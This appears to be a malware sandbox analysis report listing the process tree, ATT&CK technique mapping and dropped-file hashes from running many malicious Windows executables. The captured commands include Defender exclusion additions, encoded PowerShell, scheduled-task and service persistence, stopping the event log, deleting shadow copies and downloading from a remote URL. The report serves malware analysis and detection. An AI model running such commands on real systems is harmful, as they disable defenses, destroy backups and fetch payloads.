C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:7464

C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe
"C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"
4⤵
PID:4604

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F
5⤵
- Creates scheduled task(s)
PID:8656

C:\Users\Admin\AppData\Local\Temp\1000272001\FirstZ.exe
"C:\Users\Admin\AppData\Local\Temp\1000272001\FirstZ.exe"
5⤵
PID:6752

C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"
4⤵
PID:9056

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:4692

C:\Users\Admin\Desktop\a\build13.exe
"C:\Users\Admin\Desktop\a\build13.exe"
2⤵
PID:6384

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:7140

C:\Users\Admin\Desktop\a\csrss.exe
"C:\Users\Admin\Desktop\a\csrss.exe"
2⤵
PID:7232

C:\Users\Admin\Desktop\a\sdf34ert3etgrthrthfghfghjfgh.exe
"C:\Users\Admin\Desktop\a\sdf34ert3etgrthrthfghfghjfgh.exe"
2⤵
PID:7744

C:\Users\Admin\AppData\Local\Temp\katDA7D.tmp
C:\Users\Admin\AppData\Local\Temp\katDA7D.tmp
3⤵
PID:6996

C:\Users\Admin\Desktop\a\inte.exe
"C:\Users\Admin\Desktop\a\inte.exe"
2⤵
PID:6280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\Desktop\a\inte.exe" & exit
3⤵
PID:5520

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "inte.exe" /f
4⤵
- Kills process with taskkill
PID:7884

C:\Users\Admin\Desktop\a\swizzz.exe
"C:\Users\Admin\Desktop\a\swizzz.exe"
2⤵
PID:6352

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:7360

C:\Users\Admin\Desktop\a\ReurgingGleek.exe
"C:\Users\Admin\Desktop\a\ReurgingGleek.exe"
2⤵
PID:7972

C:\ProgramData\system.exe
"C:\ProgramData\system.exe"
3⤵
PID:5860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\system.exe'
4⤵
- Command and Scripting Interpreter: PowerShell
PID:8768

C:\ProgramData\build.exe
"C:\ProgramData\build.exe"
3⤵
PID:7280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7972 -s 1128
3⤵
- Program crash
PID:6708

C:\Users\Admin\Desktop\a\tdrpload.exe
"C:\Users\Admin\Desktop\a\tdrpload.exe"
2⤵
PID:7276

C:\Windows\sysblardsv.exe
C:\Windows\sysblardsv.exe
3⤵
PID:7056

C:\Users\Admin\AppData\Local\Temp\2668021593.exe
C:\Users\Admin\AppData\Local\Temp\2668021593.exe
4⤵
PID:8596

C:\Windows\syslmgrsvc.exe
C:\Windows\syslmgrsvc.exe
5⤵
PID:5584

C:\Users\Admin\AppData\Local\Temp\766512685.exe
C:\Users\Admin\AppData\Local\Temp\766512685.exe
6⤵
PID:8676

C:\Users\Admin\AppData\Local\Temp\2182819156.exe
C:\Users\Admin\AppData\Local\Temp\2182819156.exe
6⤵
PID:2792

C:\Users\Admin\AppData\Local\Temp\2514031634.exe
C:\Users\Admin\AppData\Local\Temp\2514031634.exe
4⤵
PID:3148

C:\Windows\winqlsdrvcs.exe
C:\Windows\winqlsdrvcs.exe
5⤵
PID:8244

C:\Users\Admin\AppData\Local\Temp\2018211776.exe
C:\Users\Admin\AppData\Local\Temp\2018211776.exe
6⤵
PID:5436

C:\Users\Admin\AppData\Local\Temp\3334011716.exe
C:\Users\Admin\AppData\Local\Temp\3334011716.exe
6⤵
PID:3396

C:\Users\Admin\AppData\Local\Temp\262769266.exe
C:\Users\Admin\AppData\Local\Temp\262769266.exe
4⤵
PID:8744

C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
"C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
5⤵
PID:2624

C:\Users\Admin\AppData\Local\Temp\2088613033.exe
C:\Users\Admin\AppData\Local\Temp\2088613033.exe
4⤵
PID:4432

C:\Users\Admin\Desktop\a\print.exe
"C:\Users\Admin\Desktop\a\print.exe"
2⤵
PID:3176

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
PID:3496

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
PID:6584

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
PID:7636

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
PID:6152

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
3⤵
- Launches sc.exe
PID:6564

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
3⤵
- Launches sc.exe
PID:7580

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:6308

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
3⤵
- Launches sc.exe
PID:5728

C:\Users\Admin\Desktop\a\Pirate_24S.exe
"C:\Users\Admin\Desktop\a\Pirate_24S.exe"
2⤵
PID:4716

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.vbs"
3⤵
PID:7844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.cmd" "
4⤵
PID:8276

C:\Users\Admin\Desktop\a\fd1.exe
"C:\Users\Admin\Desktop\a\fd1.exe"
2⤵
PID:8624

C:\Users\Admin\Desktop\a\fd1.exe
C:\Users\Admin\Desktop\a\fd1.exe
3⤵
PID:8464

C:\Users\Admin\Desktop\a\msfiler.exe
"C:\Users\Admin\Desktop\a\msfiler.exe"
2⤵
PID:8744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEQAZQBzAGsAdABvAHAAXABhAFwAbQBzAGYAaQBsAGUAcgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAbQBzAGYAaQBsAGUAcgAuAGUAeABlADsA
3⤵
PID:3364

C:\Users\Admin\Desktop\a\msfiler.exe
C:\Users\Admin\Desktop\a\msfiler.exe
3⤵
PID:8044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8044 -s 1456
4⤵
- Program crash
PID:180

C:\Users\Admin\Desktop\a\msmng2.exe
"C:\Users\Admin\Desktop\a\msmng2.exe"
2⤵
PID:8720

C:\Users\Admin\Desktop\a\test.exe
"C:\Users\Admin\Desktop\a\test.exe"
2⤵
PID:8520

C:\Users\Admin\Desktop\a\cmd.exe
"C:\Users\Admin\Desktop\a\cmd.exe"
2⤵
PID:2140

C:\Users\Admin\Desktop\a\cmt.exe
"C:\Users\Admin\Desktop\a\cmt.exe"
2⤵
PID:7980

C:\Users\Admin\Desktop\a\findlawthose.exe
"C:\Users\Admin\Desktop\a\findlawthose.exe"
2⤵
PID:8848

C:\Users\Admin\Desktop\a\pub11.exe
"C:\Users\Admin\Desktop\a\pub11.exe"
2⤵
PID:1344

C:\Users\Admin\Desktop\a\univ.exe
"C:\Users\Admin\Desktop\a\univ.exe"
2⤵
PID:8360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "univ.exe" /f & erase "C:\Users\Admin\Desktop\a\univ.exe" & exit
3⤵
PID:8148

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "univ.exe" /f
4⤵
- Kills process with taskkill
PID:3344

C:\Users\Admin\Desktop\a\nine.exe
"C:\Users\Admin\Desktop\a\nine.exe"
2⤵
PID:9076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9076 -s 460
3⤵
- Program crash
PID:3640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9076 -s 760
3⤵
- Program crash
PID:384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9076 -s 776
3⤵
- Program crash
PID:7916

C:\Users\Admin\Desktop\a\taskmgr.exe
"C:\Users\Admin\Desktop\a\taskmgr.exe"
2⤵
PID:5728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\a\taskmgr.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
PID:6636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskmgr.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
PID:4716

C:\Users\Admin\Desktop\a\Windows.exe
"C:\Users\Admin\Desktop\a\Windows.exe"
2⤵
PID:9148

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath C:\
3⤵
- Command and Scripting Interpreter: PowerShell
PID:8284

C:\Users\Admin\Documents\images.exe
"C:\Users\Admin\Documents\images.exe"
3⤵
PID:4288

C:\Users\Admin\Desktop\a\Discord.exe
"C:\Users\Admin\Desktop\a\Discord.exe"
2⤵
PID:8880

C:\Users\Admin\Desktop\a\my.exe
"C:\Users\Admin\Desktop\a\my.exe"
2⤵
PID:616

C:\Users\Admin\Desktop\a\pclient.exe
"C:\Users\Admin\Desktop\a\pclient.exe"
2⤵
PID:5820

C:\Users\Admin\Desktop\a\leadiadequatepro.exe
"C:\Users\Admin\Desktop\a\leadiadequatepro.exe"
2⤵
PID:5520

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\leadadequate.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\leadadequate.exe
3⤵
PID:1404

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2868

C:\Users\Admin\Desktop\Files\crypted.exe
"C:\Users\Admin\Desktop\Files\crypted.exe"
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5484

C:\Users\Admin\Desktop\Files\cp.exe
"C:\Users\Admin\Desktop\Files\cp.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5740

C:\Users\Admin\Desktop\Files\qausarneedscrypted.exe
"C:\Users\Admin\Desktop\Files\qausarneedscrypted.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6024

C:\Users\Admin\Desktop\Files\net.exe
"C:\Users\Admin\Desktop\Files\net.exe"
2⤵
PID:6136

C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
"C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
3⤵
PID:3760

C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
"C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
4⤵
PID:7508

C:\Users\Admin\Desktop\Files\net.exe
"C:\Users\Admin\Desktop\Files\net.exe"
3⤵
PID:1760

C:\Users\Admin\Desktop\Files\2.3.1.1.exe
"C:\Users\Admin\Desktop\Files\2.3.1.1.exe"
2⤵
PID:5900

C:\Windows\SysWOW64\openfiles.exe
"C:\Windows\SysWOW64\openfiles.exe"
2⤵
PID:6652

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5560

C:\Users\Admin\Desktop\Files\update.exe
"C:\Users\Admin\Desktop\Files\update.exe"
2⤵
PID:8716

C:\Users\Admin\Desktop\Files\ghjkl.exe
"C:\Users\Admin\Desktop\Files\ghjkl.exe"
2⤵
PID:4556

C:\Users\Admin\Desktop\Files\ghjkl.exe
"C:\Users\Admin\Desktop\Files\ghjkl.exe"
3⤵
PID:2588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 368
4⤵
- Program crash
PID:6172

C:\Users\Admin\Desktop\New Text Document mod.exe
"C:\Users\Admin\Desktop\New Text Document mod.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5952

C:\Users\Admin\Desktop\a\Specsssj..exe
"C:\Users\Admin\Desktop\a\Specsssj..exe"
2⤵
PID:4292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\Specsssj..exe" -Force
3⤵
- Command and Scripting Interpreter: PowerShell
PID:3216

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
3⤵
PID:2540

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
3⤵
PID:5808

C:\Users\Admin\Desktop\a\winresinet.exe
"C:\Users\Admin\Desktop\a\winresinet.exe"
2⤵
PID:6872

C:\Users\Admin\Desktop\a\lumma1234.exe
"C:\Users\Admin\Desktop\a\lumma1234.exe"
2⤵
PID:6508

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6648

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6804

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:3676

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6988

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6928

C:\Users\Admin\Desktop\a\1234.exe
"C:\Users\Admin\Desktop\a\1234.exe"
2⤵
PID:5596

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5576

C:\Users\Admin\Desktop\a\conhost.exe
"C:\Users\Admin\Desktop\a\conhost.exe"
2⤵
PID:3100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
3⤵
PID:5504

C:\Windows\system32\mode.com
mode 65,10
4⤵
PID:8824

C:\Users\Admin\Desktop\a\gena.exe
"C:\Users\Admin\Desktop\a\gena.exe"
2⤵
PID:7416

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:8024

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:6832

C:\Users\Admin\Desktop\a\o2i3jroi23joj23ikrjokij3oroi.exe
"C:\Users\Admin\Desktop\a\o2i3jroi23joj23ikrjokij3oroi.exe"
2⤵
PID:7304

C:\Users\Admin\AppData\Local\Temp\katE2F8.tmp
C:\Users\Admin\AppData\Local\Temp\katE2F8.tmp
3⤵
PID:7408

C:\Users\Admin\Desktop\a\vpn-1002.exe
"C:\Users\Admin\Desktop\a\vpn-1002.exe"
2⤵
PID:8016

C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nshD5DB.tmp\abc.bat"
3⤵
PID:2708

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:6948

C:\Users\Admin\Desktop\a\swizzzz.exe
"C:\Users\Admin\Desktop\a\swizzzz.exe"
2⤵
PID:7696

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5884

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6932

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5320

C:\Users\Admin\Desktop\a\WinSec.exe
"C:\Users\Admin\Desktop\a\WinSec.exe"
2⤵
PID:2580

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath C:\
3⤵
- Command and Scripting Interpreter: PowerShell
PID:3556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3556 -s 1724
4⤵
- Program crash
PID:3640

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
3⤵
PID:2196

C:\Users\Admin\Desktop\a\lumma0805.exe
"C:\Users\Admin\Desktop\a\lumma0805.exe"
2⤵
PID:2376

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6740

C:\Users\Admin\Desktop\a\222.exe
"C:\Users\Admin\Desktop\a\222.exe"
2⤵
PID:6480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
3⤵
PID:2144

C:\Users\Admin\Desktop\a\client.exe
"C:\Users\Admin\Desktop\a\client.exe"
2⤵
PID:8156

C:\Windows\system32\Client.exe
"C:\Windows\system32\Client.exe"
3⤵
PID:2504

C:\Users\Admin\Desktop\a\reverse.exe
"C:\Users\Admin\Desktop\a\reverse.exe"
2⤵
PID:8028

C:\Users\Admin\Desktop\a\64.exe
"C:\Users\Admin\Desktop\a\64.exe"
2⤵
PID:7392

C:\Windows\SYSTEM32\cmd.exe
cmd
3⤵
PID:7048

C:\Users\Admin\Desktop\a\crypted333.exe
"C:\Users\Admin\Desktop\a\crypted333.exe"
2⤵
PID:5916

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4064

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:8748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:7948

C:\Users\Admin\Desktop\a\installer.exe
"C:\Users\Admin\Desktop\a\installer.exe"
2⤵
PID:1476

C:\Users\Admin\Desktop\a\888.exe
"C:\Users\Admin\Desktop\a\888.exe"
2⤵
PID:8404

C:\Users\Admin\Desktop\a\Kaxhwswfup.exe
"C:\Users\Admin\Desktop\a\Kaxhwswfup.exe"
2⤵
PID:3352

C:\Users\Admin\Desktop\a\yar.exe
"C:\Users\Admin\Desktop\a\yar.exe"
2⤵
PID:7636

C:\Users\Admin\Desktop\a\DbVisualizer_Pro.exe
"C:\Users\Admin\Desktop\a\DbVisualizer_Pro.exe"
2⤵
PID:8960

C:\Users\Admin\Desktop\a\e_win.exe
"C:\Users\Admin\Desktop\a\e_win.exe"
2⤵
PID:7692

C:\Users\Admin\Desktop\a\cmd.exe
"C:\Users\Admin\Desktop\a\cmd.exe" /c vssadmin.exe delete shadows /all /quiet
3⤵
PID:2608

C:\Users\Admin\Desktop\a\f.exe
"C:\Users\Admin\Desktop\a\f.exe"
2⤵
PID:4992

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5340

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /1
2⤵
PID:6192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5844 -ip 5844
1⤵
PID:5264

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
1⤵
PID:1964

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
PID:8004

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:6728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 7972 -ip 7972
1⤵
PID:7040

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
PID:8288

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
PID:8692

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
PID:6172

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
PID:1712

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
PID:8760

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:8828

C:\Windows\system32\conhost.exe
conhost.exe
2⤵
PID:544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 8044 -ip 8044
1⤵
PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 9076 -ip 9076
1⤵
PID:8792

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:6100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 9076 -ip 9076
1⤵
PID:6984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3556 -ip 3556
1⤵
PID:1184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 8716 -ip 8716
1⤵
PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2588 -ip 2588
1⤵
PID:9016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 9076 -ip 9076
1⤵
PID:9016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVABhAGcAcwAuAGUAeABlADsA
1⤵
- Command and Scripting Interpreter: PowerShell
PID:1652

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

System Services

Service Execution

Scheduled Task/Job

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\HIJEGDBGDBFI\mozglue.dll
Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\build.exe
Filesize
95KB

MD5
16280875fdcf55ab4c8f1dff6dabc72e

SHA1
39880e6fbb258f4f4fa5c79337ec893acae55fb7

SHA256
91455ac8837ff1fdba7067cd3e7f790c1649ae70164ccbdf0483eae831a7253a

SHA512
53ba4e5e88a8f19ba3faa2f1244501c2d62827a9178ec0fdc995582e03e7d8e39f2dfd7bde11285781a65a021d4f4aab48b94be66a8a1cebbd47ab0cb819202e

Download Submit
C:\ProgramData\system.exe
Filesize
75KB

MD5
70b9f8ef4c4ce24fe372b292aebcd138

SHA1
5fd7ce9318727b27db0dd50effbb632686d53f8c

SHA256
15af516d88e83cfc8d3deebe7aeb9ccaebc558fc93544ef31b612113fcce907b

SHA512
b4658ccb665aa9f43cc049a51c477a0b314c5c13d254d648e34f9feca9feb06021bbf271857f73998e31cc7f877fa5457fbe7420beb58f3563fbfbe121a4cbad

Download Submit
C:\Users\Admin\AppData\Local\MaxPad\maxpad32.exe
Filesize
2.3MB

MD5
c031fc06307b51518bd6c17c978dbc48

SHA1
f88e69c670626bf5ac93d742f3be4a82acdbc23f

SHA256
26e61b4e4961568b0b323cfdacb48c1c0d4d92967ae3dcfd890fa36d1b41472d

SHA512
09c6e030c737e8129c3b0843bbc67bede0b026e79e3bbb9d2647d1736b43c7937ac75912c6ba858d8e16c82c12a0e77960f42fcf963b9b9a4a91646ace535cd1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AddInProcess32.exe.log
Filesize
323B

MD5
4af72c00db90b95c23cc32823c5b0453

SHA1
80f3754f05c09278987cba54e34b76f1ddbee5fd

SHA256
5a99dc099cb5297a4d7714af94b14f170d8a0506899c82d6b8231a220f8dba5d

SHA512
47aa798c4822bfd0b2a9110fcd1531494da99cf6e4aba5b59bfc36e21fcb1bdb5378189318bbb8519f0e8be732d90637f787ab63997d106bbcff31396155f9ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
Filesize
2.2MB

MD5
ebc2640384e061203dcf9efb12a67cd9

SHA1
3fb2340408a4a61647fefa97766f4f82d41069f7

SHA256
c7f29056f46d16f7500f5356adaa2ef637aaf5cade2b9a78f3bcd95c0e6ec207

SHA512
